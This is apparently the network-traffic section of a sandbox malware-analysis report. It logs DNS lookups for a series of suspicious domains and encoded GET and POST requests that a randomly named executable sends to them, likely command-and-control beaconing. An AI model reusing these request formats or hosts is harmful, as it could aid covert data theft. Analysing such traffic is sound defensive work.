                                                                                                                                  Oct 22, 2024 22:59:18.636172056 CEST5324780192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:59:18.641560078 CEST80532473.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:19.319845915 CEST80532473.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:19.353101015 CEST80532473.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:19.353781939 CEST5324780192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:59:19.357115984 CEST5324780192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:59:19.362921953 CEST80532473.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:25.066884995 CEST5324880192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:25.072609901 CEST80532488.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:25.072784901 CEST5324880192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:25.082164049 CEST5324880192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:25.087665081 CEST80532488.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:26.181091070 CEST80532488.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:26.225265026 CEST80532488.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:26.225331068 CEST5324880192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:26.588761091 CEST5324880192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:27.607330084 CEST5324980192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:27.613084078 CEST80532498.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:27.619349003 CEST5324980192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:27.624110937 CEST5324980192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:27.629960060 CEST80532498.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:28.596154928 CEST80532498.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:28.648693085 CEST5324980192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:28.787535906 CEST80532498.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:28.787632942 CEST5324980192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:29.135567904 CEST5324980192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:30.153695107 CEST5325080192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:30.160080910 CEST80532508.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:30.161170006 CEST5325080192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:30.170933962 CEST5325080192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:30.177077055 CEST80532508.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:30.177687883 CEST80532508.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:31.178041935 CEST80532508.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:31.229418993 CEST5325080192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:31.361342907 CEST80532508.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:31.361421108 CEST5325080192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:31.685146093 CEST5325080192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:32.700885057 CEST5325180192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:32.708102942 CEST80532518.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:32.708183050 CEST5325180192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:32.714939117 CEST5325180192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:32.721434116 CEST80532518.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:33.673523903 CEST80532518.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:33.673578024 CEST80532518.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:33.674797058 CEST5325180192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:33.858424902 CEST80532518.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:33.858558893 CEST5325180192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:33.861151934 CEST5325180192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:33.866836071 CEST80532518.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:39.020716906 CEST5325280192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:39.028614998 CEST805325294.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:39.028695107 CEST5325280192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:39.097224951 CEST5325280192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:39.105146885 CEST805325294.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:39.966202021 CEST805325294.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:39.969207048 CEST5325280192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:40.619889021 CEST5325280192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:40.625473976 CEST805325294.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:41.649879932 CEST5325380192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:41.885962963 CEST805325394.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:41.886123896 CEST5325380192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:41.895153999 CEST5325380192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:41.900768042 CEST805325394.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:42.814241886 CEST805325394.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:42.814443111 CEST5325380192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:43.401194096 CEST5325380192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:43.406939983 CEST805325394.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:44.419796944 CEST5325480192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:44.425292969 CEST805325494.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:44.425353050 CEST5325480192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:44.436575890 CEST5325480192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:44.442254066 CEST805325494.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:44.442262888 CEST805325494.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:45.244168997 CEST805325494.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:45.245233059 CEST5325480192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:45.948040009 CEST5325480192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:45.953541994 CEST805325494.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:46.968178988 CEST5325580192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:47.199269056 CEST805325594.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:47.199366093 CEST5325580192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:47.205121040 CEST5325580192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:47.210652113 CEST805325594.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:48.035028934 CEST805325594.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:48.035088062 CEST805325594.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:48.035125017 CEST805325594.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:48.035202026 CEST805325594.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:48.035238028 CEST805325594.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:48.035271883 CEST805325594.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:48.035271883 CEST5325580192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:48.035331964 CEST5325580192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:48.035365105 CEST805325594.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:48.035533905 CEST5325580192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:48.375241995 CEST805325594.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:48.375300884 CEST5325580192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:48.375370026 CEST805325594.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:48.375452995 CEST5325580192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:48.375952959 CEST805325594.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:48.375994921 CEST5325580192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:48.377923965 CEST5325580192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:48.383356094 CEST805325594.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 23:00:04.568445921 CEST5325680192.168.2.5188.114.97.3
                                                                                                                                  Oct 22, 2024 23:00:04.574132919 CEST8053256188.114.97.3192.168.2.5
                                                                                                                                  Oct 22, 2024 23:00:04.574203014 CEST5325680192.168.2.5188.114.97.3
                                                                                                                                  Oct 22, 2024 23:00:04.581003904 CEST5325680192.168.2.5188.114.97.3
                                                                                                                                  Oct 22, 2024 23:00:04.586564064 CEST8053256188.114.97.3192.168.2.5
                                                                                                                                  Oct 22, 2024 23:00:05.305921078 CEST8053256188.114.97.3192.168.2.5
                                                                                                                                  Oct 22, 2024 23:00:05.307667017 CEST8053256188.114.97.3192.168.2.5
                                                                                                                                  Oct 22, 2024 23:00:05.311558008 CEST5325680192.168.2.5188.114.97.3
                                                                                                                                  Oct 22, 2024 23:00:05.312124968 CEST5325680192.168.2.5188.114.97.3
                                                                                                                                  Oct 22, 2024 23:00:05.317455053 CEST8053256188.114.97.3192.168.2.5

                                                                                                                                  UDP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Oct 22, 2024 22:56:21.159071922 CEST53625391.1.1.1192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:22.783904076 CEST53517861.1.1.1192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:24.807912111 CEST5806253192.168.2.51.1.1.1
                                                                                                                                  Oct 22, 2024 22:56:24.816385984 CEST53580621.1.1.1192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:30.043354034 CEST5708053192.168.2.51.1.1.1
                                                                                                                                  Oct 22, 2024 22:56:30.057569027 CEST53570801.1.1.1192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:45.958697081 CEST5410953192.168.2.51.1.1.1
                                                                                                                                  Oct 22, 2024 22:56:46.378549099 CEST53541091.1.1.1192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:00.060422897 CEST5382653192.168.2.51.1.1.1
                                                                                                                                  Oct 22, 2024 22:57:00.069848061 CEST53538261.1.1.1192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:08.139005899 CEST5820353192.168.2.51.1.1.1
                                                                                                                                  Oct 22, 2024 22:57:08.449496984 CEST53582031.1.1.1192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:21.937089920 CEST5892753192.168.2.51.1.1.1
                                                                                                                                  Oct 22, 2024 22:57:21.968242884 CEST53589271.1.1.1192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:35.687488079 CEST5303453192.168.2.51.1.1.1
                                                                                                                                  Oct 22, 2024 22:57:35.706499100 CEST53530341.1.1.1192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:49.083009958 CEST5949853192.168.2.51.1.1.1
                                                                                                                                  Oct 22, 2024 22:57:49.134582043 CEST53594981.1.1.1192.168.2.5
                                                                                                                                  Oct 22, 2024 22:58:02.732337952 CEST6372453192.168.2.51.1.1.1
                                                                                                                                  Oct 22, 2024 22:58:02.771413088 CEST53637241.1.1.1192.168.2.5
                                                                                                                                  Oct 22, 2024 22:58:16.357739925 CEST5871053192.168.2.51.1.1.1
                                                                                                                                  Oct 22, 2024 22:58:16.664597988 CEST53587101.1.1.1192.168.2.5
                                                                                                                                  Oct 22, 2024 22:58:30.221910954 CEST5555653192.168.2.51.1.1.1
                                                                                                                                  Oct 22, 2024 22:58:30.235486031 CEST53555561.1.1.1192.168.2.5
                                                                                                                                  Oct 22, 2024 22:58:43.655097961 CEST5581553192.168.2.51.1.1.1
                                                                                                                                  Oct 22, 2024 22:58:43.733046055 CEST53558151.1.1.1192.168.2.5
                                                                                                                                  Oct 22, 2024 22:58:57.373162985 CEST5669553192.168.2.51.1.1.1
                                                                                                                                  Oct 22, 2024 22:58:57.502739906 CEST53566951.1.1.1192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:10.968290091 CEST5955953192.168.2.51.1.1.1
                                                                                                                                  Oct 22, 2024 22:59:10.988677025 CEST53595591.1.1.1192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:24.373609066 CEST6027253192.168.2.51.1.1.1
                                                                                                                                  Oct 22, 2024 22:59:25.064899921 CEST53602721.1.1.1192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:38.900506973 CEST6450153192.168.2.51.1.1.1
                                                                                                                                  Oct 22, 2024 22:59:38.955065012 CEST53645011.1.1.1192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:53.389312029 CEST5650853192.168.2.51.1.1.1
                                                                                                                                  Oct 22, 2024 22:59:53.406847000 CEST53565081.1.1.1192.168.2.5

                                                                                                                                  DNS Queries

                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                  Oct 22, 2024 22:56:24.807912111 CEST192.168.2.51.1.1.10xdb0aStandard query (0)50.23.12.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:56:30.043354034 CEST192.168.2.51.1.1.10x685aStandard query (0)www.itemsort.shopA (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:56:45.958697081 CEST192.168.2.51.1.1.10x4b3cStandard query (0)www.rudemyvague.infoA (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:57:00.060422897 CEST192.168.2.51.1.1.10xd5e9Standard query (0)www.gws-treinamento2.shopA (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:57:08.139005899 CEST192.168.2.51.1.1.10x8798Standard query (0)www.sailforever.xyzA (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:57:21.937089920 CEST192.168.2.51.1.1.10x6402Standard query (0)www.launchdreamidea.xyzA (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:57:35.687488079 CEST192.168.2.51.1.1.10x4376Standard query (0)www.mondayigboleague.infoA (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:57:49.083009958 CEST192.168.2.51.1.1.10x9167Standard query (0)www.stocksm.funA (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:58:02.732337952 CEST192.168.2.51.1.1.10xdb74Standard query (0)www.drevohome.shopA (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:58:16.357739925 CEST192.168.2.51.1.1.10x5ca8Standard query (0)www.givingaway123.netA (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:58:30.221910954 CEST192.168.2.51.1.1.10xe5b1Standard query (0)www.jagdud.storeA (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:58:43.655097961 CEST192.168.2.51.1.1.10x4386Standard query (0)www.030002837.xyzA (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:58:57.373162985 CEST192.168.2.51.1.1.10xdee9Standard query (0)www.ethetf.digitalA (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:59:10.968290091 CEST192.168.2.51.1.1.10xab9cStandard query (0)www.booosted.xyzA (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:59:24.373609066 CEST192.168.2.51.1.1.10x19f2Standard query (0)www.djazdgc.tokyoA (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:59:38.900506973 CEST192.168.2.51.1.1.10xd90fStandard query (0)www.productanalytics.proA (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:59:53.389312029 CEST192.168.2.51.1.1.10xfc0fStandard query (0)www.kmjai8jf.icuA (IP address)IN (0x0001)false

                                                                                                                                  DNS Answers

                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                  Oct 22, 2024 22:56:24.816385984 CEST1.1.1.1192.168.2.50xdb0aName error (3)50.23.12.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:56:30.057569027 CEST1.1.1.1192.168.2.50x685aNo error (0)www.itemsort.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:56:30.057569027 CEST1.1.1.1192.168.2.50x685aNo error (0)www.itemsort.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:56:46.378549099 CEST1.1.1.1192.168.2.50x4b3cNo error (0)www.rudemyvague.info52.13.151.179A (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:57:00.069848061 CEST1.1.1.1192.168.2.50xd5e9Name error (3)www.gws-treinamento2.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:57:08.449496984 CEST1.1.1.1192.168.2.50x8798No error (0)www.sailforever.xyz103.106.67.112A (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:57:21.968242884 CEST1.1.1.1192.168.2.50x6402No error (0)www.launchdreamidea.xyz188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:57:21.968242884 CEST1.1.1.1192.168.2.50x6402No error (0)www.launchdreamidea.xyz188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:57:35.706499100 CEST1.1.1.1192.168.2.50x4376No error (0)www.mondayigboleague.infomondayigboleague.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:57:35.706499100 CEST1.1.1.1192.168.2.50x4376No error (0)mondayigboleague.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:57:35.706499100 CEST1.1.1.1192.168.2.50x4376No error (0)mondayigboleague.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:57:49.134582043 CEST1.1.1.1192.168.2.50x9167No error (0)www.stocksm.funwebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:57:49.134582043 CEST1.1.1.1192.168.2.50x9167No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:58:02.771413088 CEST1.1.1.1192.168.2.50xdb74No error (0)www.drevohome.shop94.23.162.163A (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:58:16.664597988 CEST1.1.1.1192.168.2.50x5ca8No error (0)www.givingaway123.net103.224.182.242A (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:58:30.235486031 CEST1.1.1.1192.168.2.50xe5b1No error (0)www.jagdud.store209.74.64.187A (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:58:43.733046055 CEST1.1.1.1192.168.2.50x4386No error (0)www.030002837.xyz030002837.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:58:43.733046055 CEST1.1.1.1192.168.2.50x4386No error (0)030002837.xyz65.21.196.90A (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:58:57.502739906 CEST1.1.1.1192.168.2.50xdee9No error (0)www.ethetf.digitalethetf.digitalCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:58:57.502739906 CEST1.1.1.1192.168.2.50xdee9No error (0)ethetf.digital3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:58:57.502739906 CEST1.1.1.1192.168.2.50xdee9No error (0)ethetf.digital15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:59:10.988677025 CEST1.1.1.1192.168.2.50xab9cNo error (0)www.booosted.xyzbooosted.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:59:10.988677025 CEST1.1.1.1192.168.2.50xab9cNo error (0)booosted.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:59:10.988677025 CEST1.1.1.1192.168.2.50xab9cNo error (0)booosted.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:59:25.064899921 CEST1.1.1.1192.168.2.50x19f2No error (0)www.djazdgc.tokyolongg002.cnCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:59:25.064899921 CEST1.1.1.1192.168.2.50x19f2No error (0)longg002.cn8.210.49.139A (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:59:38.955065012 CEST1.1.1.1192.168.2.50xd90fNo error (0)www.productanalytics.pro94.23.162.163A (IP address)IN (0x0001)false
                                                                                                                                  Oct 22, 2024 22:59:53.406847000 CEST1.1.1.1192.168.2.50xfc0fName error (3)www.kmjai8jf.icunonenoneA (IP address)IN (0x0001)false

                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                  • www.itemsort.shop
                                                                                                                                  • www.rudemyvague.info
                                                                                                                                  • www.sailforever.xyz
                                                                                                                                  • www.launchdreamidea.xyz
                                                                                                                                  • www.mondayigboleague.info
                                                                                                                                  • www.stocksm.fun
                                                                                                                                  • www.drevohome.shop
                                                                                                                                  • www.givingaway123.net
                                                                                                                                  • www.jagdud.store
                                                                                                                                  • www.030002837.xyz
                                                                                                                                  • www.ethetf.digital
                                                                                                                                  • www.booosted.xyz
                                                                                                                                  • www.djazdgc.tokyo
                                                                                                                                  • www.productanalytics.pro

                                                                                                                                  HTTP Packets

                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  0192.168.2.552994188.114.97.3801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:56:30.081974983 CEST482OUTGET /qw71/?DrelH=+N/0E0v6NJCVb805MplOCuiY6zvMpGzoX4nqdcW8deD1xdZOlnbQg5vou9xNSSthlFMWUYds/nxA/0yqGkfxHl13RnV9fZ86lxbh4XUe9xgDJH4eQTI99hcUlaXwNdeqKg==&Sx=gnM4ZH HTTP/1.1
                                                                                                                                  Host: www.itemsort.shop
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Oct 22, 2024 22:56:30.780865908 CEST926INHTTP/1.1 404
                                                                                                                                  Date: Tue, 22 Oct 2024 20:56:30 GMT
                                                                                                                                  Content-Type: text/html;charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VmaJFU7OhhnRrG6krxVvNUci44lwd94hP2%2BCfpftvjC3I1D3rFvmjxEfaOMqNf6S7LmikDGMEwavla6JnbrGFp%2BeC676Cr%2F9ahnnL5zjE0dWNSCMjOmvyFgEf2OVtO32zbRoug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8d6c64f75fb2e52c-DFW
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1237&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=482&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                  Data Raw: 61 31 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: a1<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center></body></html>0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  1192.168.2.55306552.13.151.179801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:56:46.405811071 CEST756OUTPOST /t7t4/ HTTP/1.1
                                                                                                                                  Host: www.rudemyvague.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.rudemyvague.info
                                                                                                                                  Referer: http://www.rudemyvague.info/t7t4/
                                                                                                                                  Content-Length: 206
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 45 4f 73 66 47 75 4e 45 7a 67 6d 2f 56 6e 6f 42 37 71 2b 53 35 7a 5a 65 62 2f 30 50 68 4d 5a 61 38 4f 6a 57 76 43 65 74 76 46 49 62 66 74 4f 6d 4f 6d 72 37 51 51 2f 4f 70 66 56 39 4e 64 49 61 50 56 55 39 51 35 63 35 70 6e 53 6d 5a 4a 37 63 6f 2f 6d 58 4e 58 71 65 61 43 69 72 6a 54 32 67 64 2b 73 39 48 51 70 71 72 36 64 39 72 61 6e 2b 52 47 42 58 37 56 56 69 2f 75 75 64 62 33 42 37 6c 34 30 4c 30 51 52 51 30 2b 6f 48 77 50 59 6c 69 45 79 79 2b 34 41 59 38 4d 6d 4a 4c 46 41 53 63 55 54 7a 48 5a 2f 52 50 4f 65 6e 59 30 73 5a 54 4d 49 30 4b 6e 59 44 72 2b 6b 6c 4a 47 6b 6c 4e 42 6f 6e 2b 52 77 3d
                                                                                                                                  Data Ascii: DrelH=EOsfGuNEzgm/VnoB7q+S5zZeb/0PhMZa8OjWvCetvFIbftOmOmr7QQ/OpfV9NdIaPVU9Q5c5pnSmZJ7co/mXNXqeaCirjT2gd+s9HQpqr6d9ran+RGBX7VVi/uudb3B7l40L0QRQ0+oHwPYliEyy+4AY8MmJLFAScUTzHZ/RPOenY0sZTMI0KnYDr+klJGklNBon+Rw=
                                                                                                                                  Oct 22, 2024 22:56:47.091773987 CEST1236INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.10.3
                                                                                                                                  Date: Tue, 22 Oct 2024 20:56:47 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/5.3.3
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                  Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Content-Type-Options: nosniff
